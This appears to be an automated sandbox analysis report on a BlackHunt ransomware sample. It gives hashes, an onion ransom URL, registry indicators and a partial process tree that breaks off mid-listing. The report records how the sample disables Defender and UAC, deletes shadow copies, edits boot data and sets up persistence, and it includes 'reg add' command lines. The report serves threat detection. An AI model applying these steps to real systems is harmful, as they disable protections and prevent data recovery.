Analysis
-
max time kernel
133s -
max time network
60s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:56
Static task
static1
Behavioral task
behavioral1
Sample
cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
Resource
win10v2004-20231222-en
General
-
Target
cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
-
Size
707KB
-
MD5
fe824c146fe0974cf6b1b87f30034caf
-
SHA1
8a2d1d2556c080482bab8e5b06d0072a8325ebff
-
SHA256
cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022
-
SHA512
18a2115f9b5ae8a3bf93352d7af652b0685b5ad4a57014b9faee4e29972fce06205a0c3f5732bcea66aa24e50b65f462a6182d1dfb9dce379cbb193a1940d9cc
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1l8Evnh:6uaTmkZJ+naie5OTamgEoKxLWw6h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2892 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2564 bcdedit.exe 2524 bcdedit.exe -
Renames multiple (2395) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 608 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\K: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\X: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\Q: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\T: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\M: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\G: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\L: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\Z: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\O: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\J: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\U: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\I: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\P: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\S: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\H: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\B: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\V: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\A: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\R: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\N: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jdk1.7.0_80\db\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Singapore cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\DVD Maker\fieldswitch.ax cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Creston cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Inuvik cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\SelectResolve.ppt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Puerto_Rico cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-14 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Brunei cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thule cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\whitemenu.png cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_performance_Thumbnail.bmp cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-spi-actions.xml_hidden cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_ButtonGraphic.png cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Accra cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-11 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\dnsns.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_ButtonGraphic.png cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground_PAL.wmv cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1868 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1500 vssadmin.exe 3040 vssadmin.exe 1360 vssadmin.exe 2840 vssadmin.exe 2836 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeRestorePrivilege 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeBackupPrivilege 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeTakeOwnershipPrivilege 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeAuditPrivilege 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeSecurityPrivilege 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeIncBasePriorityPrivilege 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeBackupPrivilege 2368 vssvc.exe Token: SeRestorePrivilege 2368 vssvc.exe Token: SeAuditPrivilege 2368 vssvc.exe Token: SeBackupPrivilege 2020 wbengine.exe Token: SeRestorePrivilege 2020 wbengine.exe Token: SeSecurityPrivilege 2020 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2672 wrote to memory of 2676 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 31 PID 2672 wrote to memory of 2676 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 31 PID 2672 wrote to memory of 2676 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 31 PID 2672 wrote to memory of 2676 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 31 PID 2672 wrote to memory of 2540 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 33 PID 2672 wrote to memory of 2540 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 33 PID 2672 wrote to memory of 2540 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 33 PID 2672 wrote to memory of 2540 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 33 PID 2672 wrote to memory of 2536 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 35 PID 2672 wrote to memory of 2536 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 35 PID 2672 wrote to memory of 2536 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 35 PID 2672 wrote to memory of 2536 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 35 PID 2676 wrote to memory of 2684 2676 cmd.exe 37 PID 2676 wrote to memory of 2684 2676 cmd.exe 37 PID 2676 wrote to memory of 2684 2676 cmd.exe 37 PID 2672 wrote to memory of 2568 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 38 PID 2672 wrote to memory of 2568 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 38 PID 2672 wrote to memory of 2568 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 38 PID 2672 wrote to memory of 2568 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 38 PID 2672 wrote to memory of 2524 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 150 PID 2672 wrote to memory of 2524 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 150 PID 2672 wrote to memory of 2524 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 150 PID 2672 wrote to memory of 2524 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 150 PID 2672 wrote to memory of 2580 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 42 PID 2672 wrote to memory of 2580 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 42 PID 2672 wrote to memory of 2580 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 42 PID 2672 wrote to memory of 2580 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 42 PID 2672 wrote to memory of 1364 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 44 PID 2672 wrote to memory of 1364 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 44 PID 2672 wrote to memory of 1364 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 44 PID 2672 wrote to memory of 1364 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 44 PID 2536 wrote to memory of 3024 2536 cmd.exe 46 PID 2536 wrote to memory of 3024 2536 cmd.exe 46 PID 2536 wrote to memory of 3024 2536 cmd.exe 46 PID 2672 wrote to memory of 2332 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 47 PID 2672 wrote to memory of 2332 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 47 PID 2672 wrote to memory of 2332 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 47 PID 2672 wrote to memory of 2332 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 47 PID 2540 wrote to memory of 2420 2540 cmd.exe 48 PID 2540 wrote to memory of 2420 2540 cmd.exe 48 PID 2540 wrote to memory of 2420 2540 cmd.exe 48 PID 2672 wrote to memory of 3044 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 49 PID 2672 wrote to memory of 3044 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 49 PID 2672 wrote to memory of 3044 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 49 PID 2672 wrote to memory of 3044 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 49 PID 2672 wrote to memory of 740 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 50 PID 2672 wrote to memory of 740 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 50 PID 2672 wrote to memory of 740 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 50 PID 2672 wrote to memory of 740 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 50 PID 2672 wrote to memory of 2804 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 52 PID 2672 wrote to memory of 2804 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 52 PID 2672 wrote to memory of 2804 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 52 PID 2672 wrote to memory of 2804 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 52 PID 2568 wrote to memory of 2800 2568 cmd.exe 54 PID 2568 wrote to memory of 2800 2568 cmd.exe 54 PID 2568 wrote to memory of 2800 2568 cmd.exe 54 PID 2672 wrote to memory of 2880 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 55 PID 2672 wrote to memory of 2880 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 55 PID 2672 wrote to memory of 2880 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 55 PID 2672 wrote to memory of 2880 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 55 PID 2672 wrote to memory of 2692 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 57 PID 2672 wrote to memory of 2692 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 57 PID 2672 wrote to memory of 2692 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 57 PID 2672 wrote to memory of 2692 2672 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 57 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe"C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2672 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
